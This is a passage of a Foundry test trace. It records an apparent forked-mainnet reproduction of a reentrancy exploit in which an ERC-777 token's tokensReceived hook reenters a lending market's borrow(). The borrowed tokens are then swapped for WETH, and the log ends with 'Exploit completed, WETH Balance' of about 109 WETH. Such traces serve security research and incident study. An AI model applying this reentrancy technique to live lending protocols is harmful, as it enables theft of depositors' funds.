    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0d0: 0 → 0x0000000000000000000000002db6c82ce72c8d7d770ba1b5f5ed0b6e075066d6
    │   │   │   │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 1 → 2
    │   │   │   │   │   │   │   @ 0x4026bdf937281dd950d010c8348076c63dc522c29695081040c32a2185767967: 0 → 1
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [169890] 0xfF20817765cB7f73d4bde2e66e067E58D11095C2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19480000000000000000000000 [1.948e25])
    │   │   │   │   │   ├─ [2942] 0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24::getInterfaceImplementer(0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6, 0x60881b58a7ad1ebd3bc0e92b8277996363a67ded0f43bd95d11c320bab72b5a4) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   ├─ [942] 0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24::getInterfaceImplementer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xfa352d6368bbc643bcf9d528ffaba5dd3e826137bc42f935045c6c227bd4c72a) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    │   │   │   │   │   ├─ [42622] ContractTest::tokensReceived(0xa9059cbb, 0x0000000000000000000000000000000000000000000000000000000000000000, 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6, 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19480000000000000000000000 [1.948e25], 0x, 0x)
    │   │   │   │   │   │   ├─ [39880] 0xD06527D5e56A3495252A528C4987003b712860eE::borrow(354000000000000000000 [3.54e20])
    │   │   │   │   │   │   │   ├─ [22074] 0x3d5BC3c8d13dcB8bF317092d84783c2697AE9258::borrowAllowed(0xD06527D5e56A3495252A528C4987003b712860eE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 354000000000000000000 [3.54e20])
    │   │   │   │   │   │   │   │   ├─ [21394] 0x02E795EEc131246128346D17d2f564D7bF7C705b::borrowAllowed(0xD06527D5e56A3495252A528C4987003b712860eE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 354000000000000000000 [3.54e20]) [delegatecall]
    │   │   │   │   │   │   │   │   │   ├─ [901] 0x338EEE1F7B89CE6272f302bDC4b952C13b221f1d::getUnderlyingPrice(0xD06527D5e56A3495252A528C4987003b712860eE) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1000000000000000000 [1e18]
    │   │   │   │   │   │   │   │   │   ├─ [3427] 0xD06527D5e56A3495252A528C4987003b712860eE::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0, 2417223613775 [2.417e12], 1000000000000000000 [1e18], 206848881150465064906976491 [2.068e26]
    │   │   │   │   │   │   │   │   │   ├─ [901] 0x338EEE1F7B89CE6272f302bDC4b952C13b221f1d::getUnderlyingPrice(0xD06527D5e56A3495252A528C4987003b712860eE) [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 1000000000000000000 [1e18]
    │   │   │   │   │   │   │   │   │   ├─ [6051] 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [4548] 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [2663] 0x3C710B981F5Ef28DA1807ce7ED3F2a28580E0754::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 200197219122908640304245949 [2.001e26]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a59968feb3c75c20d52cbd
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 200197219122908640304245949 [2.001e26]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   │   ├─ [55] ContractTest::receive{value: 354000000000000000000}()
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ emit Borrow(borrower: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], borrowAmount: 354000000000000000000 [3.54e20], accountBorrows: 355000000000000000000 [3.55e20], totalBorrows: 4980439343722885010853 [4.98e21])
    │   │   │   │   │   │   │   ├─ [949] 0x3d5BC3c8d13dcB8bF317092d84783c2697AE9258::borrowVerify(0xD06527D5e56A3495252A528C4987003b712860eE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 354000000000000000000 [3.54e20])
    │   │   │   │   │   │   │   │   ├─ [342] 0x02E795EEc131246128346D17d2f564D7bF7C705b::borrowVerify(0xD06527D5e56A3495252A528C4987003b712860eE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 354000000000000000000 [3.54e20]) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 11: 0x0000000000000000000000000000000000000000000000faccbe573095e3d5a5 → 0x00000000000000000000000000000000000000000000010dfd7afb9e0e2bd5a5
    │   │   │   │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000 → 0x0000000000000000000000000000000000000000000000133e9d5b211fac0000
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ emit Transfer(from: 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 19480000000000000000000000 [1.948e25])
    │   │   │   │   │   ├─ emit TransferByPartition(fromPartition: 0x0000000000000000000000000000000000000000000000000000000000000000, operator: 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6, from: 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 19480000000000000000000000 [1.948e25], data: 0x, operatorData: 0x)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xc4f5170058ce377edd9da1023629340dd154fa15ac50f7626e508bf2f203667b: 0x0000000000000000000000000000000000000000001bd8996e2eff8269f88143 → 0x0000000000000000000000000000000000000000000bbb8c83aff6de0af88143
    │   │   │   │   │   │   @ 0x0eceb1b9feb652a10f88a38f22ed704e8e68735faf01049a4552285c000b4718: 0x0000000000000000000000000000000000000000001bd8996e2eff8269f88143 → 0x0000000000000000000000000000000000000000000bbb8c83aff6de0af88143
    │   │   │   │   │   │   @ 0xdbbde71e1a4080345235257e965b73612794cf3c85775e62f0a4e44906b67515: 0 → 1
    │   │   │   │   │   │   @ 0x755303852e9d37ba89f8d7ed329dac976d9b4e2d10c29c8c06b3e8c55a8b25d6: 0 → 0x000000000000000000000000000000000000000000101d0cea7f08a45f000000
    │   │   │   │   │   │   @ 0xd71c5065f44c4a0800fa9336624a57623dfb9a93f190d91ebb292fe3084224b4: 0 → 0x000000000000000000000000000000000000000000101d0cea7f08a45f000000
    │   │   │   │   │   │   @ 0x28771ffa18a1f355b0acb3c2b96320d7d689d5a4ff51cb1926883e6fa255c0ef: 0 → 1
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Borrow(borrower: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], borrowAmount: 19480000000000000000000000 [1.948e25], accountBorrows: 19480000000000000000000000 [1.948e25], totalBorrows: 489649340036725221561094894 [4.896e26])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0 → 0x000000000000000000000000000000000000000000101d0cea7f08a45f000000
    │   │   │   │   │   @ 19: 0x0000000000000000000000000000000000000000001bd8996e2eff8269f88143 → 0x0000000000000000000000000000000000000000000bbb8c83aff6de0af88143
    │   │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000184ea3afec513e4d7e252ee → 0x000000000000000000000000000000000000000001950747e9441c8936e252ee
    │   │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2b: 0 → 0x0000000000000000000000000000000000000000000000000e26de82b5ceec29
    │   │   │   │   └─ ← [Return] 0
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [21974] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::deposit{value: 355000000000000000000}()
    │   │   │   ├─ emit Deposit(dst: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 355000000000000000000 [3.55e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000133e9d5b211fac0000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [26922] 0xfF20817765cB7f73d4bde2e66e067E58D11095C2::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 19480000000000000000000000000 [1.948e28])
    │   │   │   ├─ emit ApprovalByPartition(partition: 0x0000000000000000000000000000000000000000000000000000000000000000, owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 19480000000000000000000000000 [1.948e28])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 19480000000000000000000000000 [1.948e28])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x6ea4483a86392dea92ae0f235dcb3aa993aec253fc0b4ef9f7c1ea2aa8810b4a: 0 → 0x00000000000000000000000000000000000000003ef17a740039c21318000000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [95918] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokens(19480000000000000000000000 [1.948e25], 1, [0xfF20817765cB7f73d4bde2e66e067E58D11095C2, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1630302276 [1.63e9])
    │   │   │   ├─ [2504] 0x08650bb9dc722C9c8C62E79C2BAfA2d3fc5B3293::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 975018292290218898234 [9.75e20], 54500123291644810090649509 [5.45e25], 1630302266 [1.63e9]
    │   │   │   ├─ [42579] 0xfF20817765cB7f73d4bde2e66e067E58D11095C2::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x08650bb9dc722C9c8C62E79C2BAfA2d3fc5B3293, 19480000000000000000000000 [1.948e25])
    │   │   │   │   ├─ [2942] 0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24::getInterfaceImplementer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x60881b58a7ad1ebd3bc0e92b8277996363a67ded0f43bd95d11c320bab72b5a4) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   ├─ [2942] 0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24::getInterfaceImplementer(0x08650bb9dc722C9c8C62E79C2BAfA2d3fc5B3293, 0xfa352d6368bbc643bcf9d528ffaba5dd3e826137bc42f935045c6c227bd4c72a) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x08650bb9dc722C9c8C62E79C2BAfA2d3fc5B3293, value: 19480000000000000000000000 [1.948e25])
    │   │   │   │   ├─ emit TransferByPartition(fromPartition: 0x0000000000000000000000000000000000000000000000000000000000000000, operator: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x08650bb9dc722C9c8C62E79C2BAfA2d3fc5B3293, value: 19480000000000000000000000 [1.948e25], data: 0x, operatorData: 0x)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xdbbde71e1a4080345235257e965b73612794cf3c85775e62f0a4e44906b67515: 1 → 0
    │   │   │   │   │   @ 0x2d68ab668c2a485a326ab366baa6f60a32eebd4a205a39be46a1abc2321150ec: 0x0000000000000000000000000000000000000000002d14d99a8a8a510d9617a5 → 0x0000000000000000000000000000000000000000003d31e6850992f56c9617a5
    │   │   │   │   │   @ 0xe322ddc3bcda59ceeddea5e70753d16a37e6d0f09c9b678cd67ca9a406eeb018: 0x0000000000000000000000000000000000000000002d14d99a8a8a510d9617a5 → 0x0000000000000000000000000000000000000000003d31e6850992f56c9617a5
    │   │   │   │   │   @ 0xd71c5065f44c4a0800fa9336624a57623dfb9a93f190d91ebb292fe3084224b4: 0x000000000000000000000000000000000000000000101d0cea7f08a45f000000 → 0
    │   │   │   │   │   @ 0x28771ffa18a1f355b0acb3c2b96320d7d689d5a4ff51cb1926883e6fa255c0ef: 1 → 0
    │   │   │   │   │   @ 0x6ea4483a86392dea92ae0f235dcb3aa993aec253fc0b4ef9f7c1ea2aa8810b4a: 0x00000000000000000000000000000000000000003ef17a740039c21318000000 → 0x00000000000000000000000000000000000000003ee15d6715bab96eb9000000
    │   │   │   │   │   @ 0x755303852e9d37ba89f8d7ed329dac976d9b4e2d10c29c8c06b3e8c55a8b25d6: 0x000000000000000000000000000000000000000000101d0cea7f08a45f000000 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [40516] 0x08650bb9dc722C9c8C62E79C2BAfA2d3fc5B3293::swap(256168087922212625919 [2.561e20], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [8062] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 256168087922212625919 [2.561e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x08650bb9dc722C9c8C62E79C2BAfA2d3fc5B3293, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 256168087922212625919 [2.561e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xd7a62467018182711d671773d6ced3f9e6d03a3d07d22ca0c835b14823e6fe82: 0x000000000000000000000000000000000000000000000034db18d2f83a7c333a → 0x000000000000000000000000000000000000000000000026f80cf43db7f7d53b
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000133e9d5b211fac0000 → 0x00000000000000000000000000000000000000000000002121a939dba2305dff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x08650bb9dc722C9c8C62E79C2BAfA2d3fc5B3293) [staticcall]
    │   │   │   │   │   └─ ← [Return] 718850204368006272315 [7.188e20]
    │   │   │   │   ├─ [597] 0xfF20817765cB7f73d4bde2e66e067E58D11095C2::balanceOf(0x08650bb9dc722C9c8C62E79C2BAfA2d3fc5B3293) [staticcall]
    │   │   │   │   │   └─ ← [Return] 73980123291644810090649509 [7.398e25]
    │   │   │   │   ├─ emit Sync(reserve0: 718850204368006272315 [7.188e20], reserve1: 73980123291644810090649509 [7.398e25])
    │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 19480000000000000000000000 [1.948e25], amount0Out: 256168087922212625919 [2.561e20], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x000000000000000000000000021bbda4ef8d0be299d7804be409867e0ac8a60e → 0x000000000000000000000000021bbdad77022ed9674a27b1da6c9901605b47ba
    │   │   │   │   │   @ 10: 0x0000000000000000000000000000000001fb87230bc662885888f89773fc3d77 → 0x0000000000000000000000000000000001fb872ec540c567f82c19c7cf8b8cb3
    │   │   │   │   │   @ 8: 0x612c703a0000002d14d99a8a8a510d9617a5000000000034db18d2f83a7c333a → 0x612c70440000003d31e6850992f56c9617a5000000000026f80cf43db7f7d53b
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [19480000000000000000000000 [1.948e25], 256168087922212625919 [2.561e20]]
    │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0xd3d2E2692501A5c9Ca623199D38826e513033a17, 502000000000000000000 [5.02e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xd3d2E2692501A5c9Ca623199D38826e513033a17, value: 502000000000000000000 [5.02e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000002121a939dba2305dff → 0x000000000000000000000000000000000000000000000005eb02f59164185dff
    │   │   │   │   @ 0xc0e75612d35d156c6027aa01afe2ad7d80853c95e612a023a4992c7cbe19ff21: 0x000000000000000000000000000000000000000000000361f7314e2d02839b1d → 0x00000000000000000000000000000000000000000000037d2dd79277409b9b1d
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 109168087922212625919 [1.091e20]
    │   │   ├─ [25162] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], 109168087922212625919 [1.091e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], value: 109168087922212625919 [1.091e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0a94e286e9304854df5b3f17b7089cd30cba9c4e94387f348447ad723c407a44: 0 → 0x000000000000000000000000000000000000000000000005eb02f59164185dff
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000005eb02f59164185dff → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0: 0 → 1
    │   │   │   @ 0xc0e75612d35d156c6027aa01afe2ad7d80853c95e612a023a4992c7cbe19ff21: 0x000000000000000000000000000000000000000000000361f7314e2d02839b1d → 0x00000000000000000000000000000000000000000000037d2dd79277409b9b1d
    │   │   │   @ 12: 0x000000000000000000000000000000000000000000002be333f6fac1080ae12f → 1
    │   │   └─ ← [Stop]
    │   ├─ [2797] 0x1f9840a85d5aF5bf1D1762F925BDADdC4201F984::balanceOf(0xd3d2E2692501A5c9Ca623199D38826e513033a17) [staticcall]
    │   │   └─ ← [Return] 1992277665188069083236236 [1.992e24]
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xd3d2E2692501A5c9Ca623199D38826e513033a17) [staticcall]
    │   │   └─ ← [Return] 16476245727715211844381 [1.647e22]
    │   ├─ emit Sync(reserve0: 1992277665188069083236236 [1.992e24], reserve1: 16476245727715211844381 [1.647e22])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 502000000000000000000 [5.02e20], amount0Out: 0, amount1Out: 500000000000000000000 [5e20], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 9: 0x00000000000000000000000000000004a60be0cccf834db4ec1de4794558cfcd → 0x00000000000000000000000000000004a60c531c84eb0b0a7d95145bb5b78aa5
    │   │   @ 8: 0x612c700e00000000037d1216250ff1d39b1d00000001a5e196b11516b2bcc78c → 0x612c704400000000037d2dd79277409b9b1d00000001a5e196b11516b2bcc78c
    │   │   @ 10: 0x0000000000000000000000000000c74858bcf3be3a60d4049bc648c307db9bab → 0x0000000000000000000000000000c748723f539c51a5314a3a05f937ed657fc7
    │   └─ ← [Stop]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   └─ ← [Return] 109168087922212625919 [1.091e20]
    ├─ emit log_named_uint(key: "Exploit completed, WETH Balance", val: 109168087922212625919 [1.091e20])
    ├─  storage changes:
    │   @ 38: 0 → 0x0000000000000000000000001804c8ab1f12e6bbf3894d4083f33e07309d1f38
    │   @ 12: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 34.75s (33.26s CPU time)

Ran 2 test suites in 35.83s (35.22s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
